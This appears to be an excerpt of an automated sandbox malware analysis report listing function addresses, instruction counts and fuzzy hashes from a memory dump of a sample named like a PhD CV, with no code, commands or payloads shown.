                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d788b77b789087dac80c973e6d117d7b76cd036843a6ce79119f52379ef2747a
                                                                                                  • Instruction ID: daf832f53bdc5fd7237118405906beb23188911f65c981f416a953b8a789cd8f
                                                                                                  • Opcode Fuzzy Hash: d788b77b789087dac80c973e6d117d7b76cd036843a6ce79119f52379ef2747a
                                                                                                  • Instruction Fuzzy Hash: C301A232B00605DBDB14EF66ED06EAFB3ADBB81770F158069F90197242DE28ED06E750
                                                                                                  Function 00FEE6D0 Relevance: .0, Instructions: 46COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 08d41bbeb6927c32469e7ec1b6930f0f5fcf54235d5ff39387b6018c1dedced9
                                                                                                  • Instruction ID: 3d1922ed6df119092a480c87527172cbce68a8d359831afad09a03b8e8318bff
                                                                                                  • Opcode Fuzzy Hash: 08d41bbeb6927c32469e7ec1b6930f0f5fcf54235d5ff39387b6018c1dedced9
                                                                                                  • Instruction Fuzzy Hash: 3E01F272240700ABD3325F16EC41B06BAACFB86B60F10042ABA448F380D6B8E840D744
                                                                                                  Function 00FC488F Relevance: .0, Instructions: 46COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 823807cfdc3526187a8accd29f046324b0d93746e15b0c0163723cf5710ad37e
                                                                                                  • Instruction ID: e235e855729910771d2da0c3a4e829df47fe7902bb865f8e01290e719b372412
                                                                                                  • Opcode Fuzzy Hash: 823807cfdc3526187a8accd29f046324b0d93746e15b0c0163723cf5710ad37e
                                                                                                  • Instruction Fuzzy Hash: 0201A272B00306AFDB219F99DEC1F59B7ECAB85760F000029EA4097242D7B9EE4497A0
                                                                                                  Function 00F424A2 Relevance: .0, Instructions: 45COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 205f56ca16b4406fa303f37cc51831932a19e797223f9687a9d71eafe6a985f4
                                                                                                  • Instruction ID: 50ea7e401257fc8c59bd79509534eaeadeb92c2b07748d9b60e36fad6f8ec7ec
                                                                                                  • Opcode Fuzzy Hash: 205f56ca16b4406fa303f37cc51831932a19e797223f9687a9d71eafe6a985f4
                                                                                                  • Instruction Fuzzy Hash: 03F0F433A41A60B7C731DF5ACC41F17BEA9EBC4FA0F114028BE0597251D624ED01E6A0
                                                                                                  Function 01014AE8 Relevance: .0, Instructions: 45COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 948ec57ba056adb94c349ed2728e1c2fc3437ed186b0bdceb878444ad1e01a44
                                                                                                  • Instruction ID: 5cd04a29aa67b63bf3367bb9f13bd24ee201549ede157499a762c8a49ffc3b09
                                                                                                  • Opcode Fuzzy Hash: 948ec57ba056adb94c349ed2728e1c2fc3437ed186b0bdceb878444ad1e01a44
                                                                                                  • Instruction Fuzzy Hash: 8C0129B1A00219ABCB04DFA9D845ADEB7F8FF48304F10445AF911E7341D778EA01CBA4
                                                                                                  Function 00F3C2B0 Relevance: .0, Instructions: 43COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f9429900c64a47a2e9c2ca5d52e6d9bd748c69c7f3c99ecb53a8a2d053acaf1b
                                                                                                  • Instruction ID: 367510df8e13c92be374a772afebb61dd347fe7dd10d2b32d5e22f78364bfbd8
                                                                                                  • Opcode Fuzzy Hash: f9429900c64a47a2e9c2ca5d52e6d9bd748c69c7f3c99ecb53a8a2d053acaf1b
                                                                                                  • Instruction Fuzzy Hash: 54F0F6336415229BD73216E94C40B2BB5A59FC5B70F26003AF505BB640CE64CC02B7D4
                                                                                                  Function 01014B67 Relevance: .0, Instructions: 43COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9afb5aec626dee8af665a4fcac77ab904ea893d4be82324470af74254661ed48
                                                                                                  • Instruction ID: caf84830c91327519900946aa7705bd5961e8bb82cdfa38b207844f48cec6f0b
                                                                                                  • Opcode Fuzzy Hash: 9afb5aec626dee8af665a4fcac77ab904ea893d4be82324470af74254661ed48
                                                                                                  • Instruction Fuzzy Hash: 83011E71A002199BDB00DFA9D985ADEBBF8EF48704F10405AFA05E7351D638EA018BA0
                                                                                                  Function 01014BE0 Relevance: .0, Instructions: 43COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b6a5321b55f2e961acf36b695a305f8199112e4df7d08eba05d7f12cd962f2b3
                                                                                                  • Instruction ID: 533b9fbf633ac15b959bd9268e77d31f43a7e8bc6549e6ba0f8c97624f39323d
                                                                                                  • Opcode Fuzzy Hash: b6a5321b55f2e961acf36b695a305f8199112e4df7d08eba05d7f12cd962f2b3
                                                                                                  • Instruction Fuzzy Hash: 55011E71A0021D9BCB04EF69D9559EEB7F8EF48704F10405AF900E7251D678E9018BA4
                                                                                                  Function 01014C59 Relevance: .0, Instructions: 43COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 55f094e5b3fb01ef1b8cccc3f7efdf56ab3dfbb01507951339c4f95c1870efdc
                                                                                                  • Instruction ID: 0fbb5c44046cbca3f7bd78b077a3c450bea833201cbd9b77254c3899c0599df5
                                                                                                  • Opcode Fuzzy Hash: 55f094e5b3fb01ef1b8cccc3f7efdf56ab3dfbb01507951339c4f95c1870efdc
                                                                                                  • Instruction Fuzzy Hash: FB011E71A1021D9BDB00DF69D9459DEB7F8EF48704F50405AF910F7251D678E9018BA0
                                                                                                  Function 00F7C98F Relevance: .0, Instructions: 42COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8a49d7d89f33e5bf064cc7cc815dab5f191e9a4415fd639dc17ebe174072b9c1
                                                                                                  • Instruction ID: 6c606559efc6f9f3145f0651f49699eb32603cb71bed16f4a4725f03577e34f8
                                                                                                  • Opcode Fuzzy Hash: 8a49d7d89f33e5bf064cc7cc815dab5f191e9a4415fd639dc17ebe174072b9c1
                                                                                                  • Instruction Fuzzy Hash: C701F932640D84EBD3225A5EC808F95BBECEFC17A0F0940A6FE049B2A1DA79CD01E651
                                                                                                  Function 00FC6040 Relevance: .0, Instructions: 41COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0dd29ffe6cddaff40cdda75bcb1669297d52e5307dee62bf9dea0ffac2072810
                                                                                                  • Instruction ID: 47db1a24f33c3ef7b464aebd5864f30680ecbabfcd08dfd3f261206da72381e0
                                                                                                  • Opcode Fuzzy Hash: 0dd29ffe6cddaff40cdda75bcb1669297d52e5307dee62bf9dea0ffac2072810
                                                                                                  • Instruction Fuzzy Hash: A5F0907220000DBFEF019F94CD81DAF7BBEEF48398B100128FA0092020D736DE21ABA0
                                                                                                  Function 00FCA130 Relevance: .0, Instructions: 40COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f94a6b76c4d0750698a920cf168bb8f0e81deb20106ff7e6b73519f1ca75a2c1
                                                                                                  • Instruction ID: 1c7b139b54e9b58019228d15e98744cb4bceef9c895d7a5782c4b2af658c2371
                                                                                                  • Opcode Fuzzy Hash: f94a6b76c4d0750698a920cf168bb8f0e81deb20106ff7e6b73519f1ca75a2c1
                                                                                                  • Instruction Fuzzy Hash: 3A019A3651014DABCF129F84DD41EDA3F66FB4C768F098105FE1866220C236E971EF81
                                                                                                  Function 00F3C090 Relevance: .0, Instructions: 39COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1423cfc84d9b2511b8b34e12a1d1687aa29ac9de5ef1e7c53d21526a0f9693b6
                                                                                                  • Instruction ID: c7a545fcb5fa38a48e0e656e214913a627efaa8543d49dd6496a767a0f6612b8
                                                                                                  • Opcode Fuzzy Hash: 1423cfc84d9b2511b8b34e12a1d1687aa29ac9de5ef1e7c53d21526a0f9693b6
                                                                                                  • Instruction Fuzzy Hash: 56F02BB3644380DBE718D6058C11B637686D7C0730F25803AEE05DF1D2DA71DC41E394
                                                                                                  Function 00F7648A Relevance: .0, Instructions: 39COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 668370e600360be6d39192adfb4598d1aea2c4fec271b6ffef0f84715b44f0ba
                                                                                                  • Instruction ID: a6f82b3f87fe5a1c78b7bd16474cd316ff402acab2729c89f9964352e6335041
                                                                                                  • Opcode Fuzzy Hash: 668370e600360be6d39192adfb4598d1aea2c4fec271b6ffef0f84715b44f0ba
                                                                                                  • Instruction Fuzzy Hash: 4A018171A40A809BE736DB2CCE4EF6533E8AB00B64F188091B905DB6D3D72CE840AA11
                                                                                                  Function 00FCE4F2 Relevance: .0, Instructions: 36COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2d61a3bfed072bebc3533729a18c2e1d60e765f99e10e027ec57f31171bb3125
                                                                                                  • Instruction ID: f920a05823ab5666d57becd39d2dad1a5d8bb338f1e6be8715b07505aa5405e1
                                                                                                  • Opcode Fuzzy Hash: 2d61a3bfed072bebc3533729a18c2e1d60e765f99e10e027ec57f31171bb3125
                                                                                                  • Instruction Fuzzy Hash: DBF05E33701613ABC7319A4DDD82F12B3B8AF85B60F2D0869BA04DB260D664EC01AB90
                                                                                                  Function 00FCC51D Relevance: .0, Instructions: 36COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b57dcf760d001d8fcb2a4ca973f63ace28c885724fb9588a0843877043a58e11
                                                                                                  • Instruction ID: df588f399269e7247fa123880d572ce5172f41bc4e76d00a113e8cb8a057c410
                                                                                                  • Opcode Fuzzy Hash: b57dcf760d001d8fcb2a4ca973f63ace28c885724fb9588a0843877043a58e11
                                                                                                  • Instruction Fuzzy Hash: 5DF0A4706057049FC314EF28C946F1AB7E4EF88B14F444A5EF8A8DB385E638E900D796
                                                                                                  Function 00F70774 Relevance: .0, Instructions: 35COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1b7835e4d6d6559359274cfa51e41153a2ed1920ea28c928af81b6d046f1638e
                                                                                                  • Instruction ID: 28e095a306b7814e4774091a78880311ec26f0b3afc1068ab70ec4001cba6b55
                                                                                                  • Opcode Fuzzy Hash: 1b7835e4d6d6559359274cfa51e41153a2ed1920ea28c928af81b6d046f1638e
                                                                                                  • Instruction Fuzzy Hash: 71F0B472610204EFE318DB21CC05B57B3EDEF99710F24C079A909D72A0FAB5ED01E615
                                                                                                  Function 00FC89A0 Relevance: .0, Instructions: 35COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f322097544d905c2f6c2c7bc22ec9174a72d28101182ca231430cb8b904c4507
                                                                                                  • Instruction ID: 4fa38094e7b5511e53d91517d3e9c310d8c60bc9544e18f22c959ec7c6e138b6
                                                                                                  • Opcode Fuzzy Hash: f322097544d905c2f6c2c7bc22ec9174a72d28101182ca231430cb8b904c4507
                                                                                                  • Instruction Fuzzy Hash: F8F0E9329002456BC7316A19EC89F6BBB5DFBC5B70F09041EFCC6275228B796C82E780
                                                                                                  Function 00FCC592 Relevance: .0, Instructions: 34COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2d44525c1511fe131b984d2fcb68ea60acebd1a4e0ecc01a2aa2d45e6e7a58c3
                                                                                                  • Instruction ID: 6479bd8691feaedc0b6c069e02cbec3e1262bc9f9d66885f8dc1adc790201672
                                                                                                  • Opcode Fuzzy Hash: 2d44525c1511fe131b984d2fcb68ea60acebd1a4e0ecc01a2aa2d45e6e7a58c3
                                                                                                  • Instruction Fuzzy Hash: 02F04F70A01209DFCB04EF68CA16F9EB7F4EF48704F108459B915EB385DA38EA01DB50
                                                                                                  Function 00F4471B Relevance: .0, Instructions: 33COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 71eae715b78b8601f777c8e49bccf52b2ed2b101264f1fbd6bdde35cff2e8ed7
                                                                                                  • Instruction ID: f12c3bec56b3d642a20fd06a9bbee01cb27686d8ae49bf51accc1d28595a7c34
                                                                                                  • Opcode Fuzzy Hash: 71eae715b78b8601f777c8e49bccf52b2ed2b101264f1fbd6bdde35cff2e8ed7
                                                                                                  • Instruction Fuzzy Hash: 27F02EB2C012A49EEB31C324C004BA1BFC8AB03370F098866DD39AB912C334FC86E250
                                                                                                  Function 00F82539 Relevance: .0, Instructions: 31COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2ed3d22eeff636eb0551a0025a211ec4f1b1c67496731614af6a82ea339e5be1
                                                                                                  • Instruction ID: 39c757437897b2e86b506adaeda95eee4a76b8cfa05deaf7a659de66e97a270f
                                                                                                  • Opcode Fuzzy Hash: 2ed3d22eeff636eb0551a0025a211ec4f1b1c67496731614af6a82ea339e5be1
                                                                                                  • Instruction Fuzzy Hash: 50E0D8727409402BD751AE598CD5F9777AEDFC2B10F040479B9045F142C9E6ED0993A0
                                                                                                  Function 00F7C50D Relevance: .0, Instructions: 31COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9c93fd1af60f26a924954de233687ebbe404677c1ae093efc1a59c19827e4fa7
                                                                                                  • Instruction ID: 50ec8ebd566276489dab87a4026b5de656844225239a52da3bca6653e98a9a79
                                                                                                  • Opcode Fuzzy Hash: 9c93fd1af60f26a924954de233687ebbe404677c1ae093efc1a59c19827e4fa7
                                                                                                  • Instruction Fuzzy Hash: E4F0E2B69216909BC721935CD048B6177D8AB01778F1EC16FD80E87512C765FC80E2C6
                                                                                                  Function 00FBCCF0 Relevance: .0, Instructions: 30COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 69755a8240fa41aff46edcf645f2ffccc7228de35c2e91f0295f4c43bde1223c
                                                                                                  • Instruction ID: 0ebd53a36c8756e9ff3b36f8ca4d7ba52d50f4e54c70373a9d8fa371c7e56673
                                                                                                  • Opcode Fuzzy Hash: 69755a8240fa41aff46edcf645f2ffccc7228de35c2e91f0295f4c43bde1223c
                                                                                                  • Instruction Fuzzy Hash: 04F0E53351061467C230AA0D8C05F9BFBACDBD4B70F10032ABA249B1D1DA74EA01DBE5
                                                                                                  Function 01014D4B Relevance: .0, Instructions: 30COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0e02d0ac519888338047da62edbca67c87427cbb568f5e47be920c01166422d0
                                                                                                  • Instruction ID: 45d69563488b7d5268dc76d3d609176a3acb77e0cf54aa2c28eca641ce66f759
                                                                                                  • Opcode Fuzzy Hash: 0e02d0ac519888338047da62edbca67c87427cbb568f5e47be920c01166422d0
                                                                                                  • Instruction Fuzzy Hash: 4EF089706102559BDB04FB68D906E6E77F8AF04708F410458BA51EB2D5EA78D900C754
                                                                                                  Function 01014DA7 Relevance: .0, Instructions: 30COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 80e51514bdf6df045f984f0f7a1f1651946ab44d522c34cda8b9765d6085f274
                                                                                                  • Instruction ID: dd98a1c3de3a116260e85324faf99decea370045b2284f5fb1f9609282a9976f
                                                                                                  • Opcode Fuzzy Hash: 80e51514bdf6df045f984f0f7a1f1651946ab44d522c34cda8b9765d6085f274
                                                                                                  • Instruction Fuzzy Hash: 0CF08970A102189BDB14FBA8D906EAE77F8AF04704F400458BA11EB2D5EA78D900C754
                                                                                                  Function 00F40630 Relevance: .0, Instructions: 28COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7fb8b229e0179ed1d94183841a0f137a63d66d46d99527f7ccba905b47740c18
                                                                                                  • Instruction ID: eb96a79f8d91ab87d9716a05053e5cefd981c3a43eb1e91ed99a4d80148c8dec
                                                                                                  • Opcode Fuzzy Hash: 7fb8b229e0179ed1d94183841a0f137a63d66d46d99527f7ccba905b47740c18
                                                                                                  • Instruction Fuzzy Hash: AAF0ED36204344DFEB05DF15E040AA57BE8ABA63A0B120094FE068B361DB39FD91EB85
                                                                                                  Function 00F748F0 Relevance: .0, Instructions: 28COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                  • Instruction ID: 184b88eb3f82ee8d758938722caba38d79f86973d323793bcde5479bca35f824
                                                                                                  • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                  • Instruction Fuzzy Hash: 9CE09233644504ABE3215E659800B6B77B59BD5762F158826F788CB240DB74EC40F391
                                                                                                  Function 00F3EBC0 Relevance: .0, Instructions: 28COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e4006c1d87aeaf3b1e9d60ac6313c76d7ac9985f5ac1451b1c7dcc12017ca6ee
                                                                                                  • Instruction ID: 4d366ae834352b9a757789224b8054f1c57b4bd0147c38aa32138aae02a3a748
                                                                                                  • Opcode Fuzzy Hash: e4006c1d87aeaf3b1e9d60ac6313c76d7ac9985f5ac1451b1c7dcc12017ca6ee
                                                                                                  • Instruction Fuzzy Hash: 55F0E532104284EFEB26DF04C846F95B7A4EF80734F048019F40A8B0D1CB78DD82EB54
                                                                                                  Function 00F38DCD Relevance: .0, Instructions: 28COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b32b66a64eb686ce2550eafeac90f07ee095e5a4bc4a895fda5be1685579c209
                                                                                                  • Instruction ID: 5f7cf1a1125816f9a72210fc96c33026e880d77330c641f7deb48b567e26a4c3
